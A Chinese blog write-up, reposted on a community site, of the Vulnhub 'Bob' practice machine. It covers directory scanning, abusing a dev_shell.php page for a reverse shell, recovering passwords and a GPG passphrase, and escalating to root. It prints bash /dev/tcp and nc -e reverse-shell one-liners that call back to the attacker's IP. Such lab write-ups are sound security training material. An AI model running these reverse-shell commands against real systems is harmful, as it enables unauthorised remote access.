【Sword系列】Vulnhub靶机Bob_v1.0.1 writeup
  6k0GrpdiCjYb 2023年11月02日 56 0

个人博客地址:  http://www.sword-blogs.com/ 下载地址:https://www.vulnhub.com/entry/bob-101,226/ 在这里插入图片描述

信息搜集

扫描IP地址

在这里插入图片描述

扫描端口及端口信息

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-h1PmvMJi-1645192295721)(assets/image-20220104222359-a5l6wo1.png)] 访问80端口并没有发现有用的信息

扫描目录

在这里插入图片描述 看到有熟悉的robots.txt,访问看一下 在这里插入图片描述 发现了dev_shell.php,可以执行一些简单的命令,但是不能执行ls,ifconfig,pwd等命令 在这里插入图片描述

getshell

bash反弹shell
bash -c 'exec bash -i &>/dev/tcp/192.168.1.140/4444 <&1'
nc发送一个shell到本地
/bin/nc 192.168.1.140 4444 -e /bin/bash

查看用户,看到一共有六个用户拥有登录权限 在这里插入图片描述 在bob的家目录里的.old_passwordfile.html文件看到了jc用户和seb用户的密码 在这里插入图片描述 尝试使用这两个用户登录 在这里插入图片描述 这两个用户也没有啥特殊的权限 继续查看bob家目录的文件,从桌面开始找,刚找到Documents就发现了一些小惊喜,login.txt.gpg 在这里插入图片描述 既然有GPG密文的文件,肯定会有解密的密钥 查看一下,还有个文件夹Secret,进去继续摸索 一路向下,来到最后一个文件,查看到一个名字为notes.sh的文件 在这里插入图片描述 没发现啥有用的信息,执行一下notes.sh这个脚本 在这里插入图片描述 仔细观察执行出来的这个结果,发现每一行都有一个大写的字母 将每一行的大写字母都提取出来 HARPOCRATES 回到login.txt.gpg的地方输入密码解密

gpg --batch --passphrase HARPOCRATES -d login.txt.gpg

在这里插入图片描述

提权

找到了bob用户的密码,使用bob用户登录,直接sudo su提权到root 在这里插入图片描述 成功获取根目录下的flag 在这里插入图片描述 到这里成功完成了该靶机! 本文所有用到的工具都可以关注微信公众号“网络安全学习爱好者”联系公众客服免费领取!有关学习的问题也可以加客服一起学习! 在这里插入图片描述

个人博客地址:  http://www.sword-blogs.com/

【版权声明】本文内容来自摩杜云社区用户原创、第三方投稿、转载,内容版权归原作者所有。本网站的目的在于传递更多信息,不拥有版权,亦不承担相应法律责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@moduyun.com

  1. 分享:
最后一次编辑于 2023年11月08日 0

暂无评论

推荐阅读
  5NWiQFAVeqgX   2024年05月17日   32   0   0 网络安全
  pTtIhLb24H2d   2024年05月17日   34   0   0 网络安全
  5NWiQFAVeqgX   2024年05月17日   38   0   0 网络安全
  OKgNPeBk991j   2024年05月18日   47   0   0 网络安全
  rKgO6TN7xbYO   2024年05月17日   38   0   0 网络安全
  5NWiQFAVeqgX   2024年05月17日   53   0   0 网络安全
  5NWiQFAVeqgX   2024年05月17日   36   0   0 网络安全
  YOkriIV1Am1d   2024年05月20日   39   0   0 网络安全
  owpmXY9hzjPv   2024年05月20日   37   0   0 网络安全
  owpmXY9hzjPv   2024年05月20日   40   0   0 网络安全
  owpmXY9hzjPv   2024年05月20日   34   0   0 网络安全
6k0GrpdiCjYb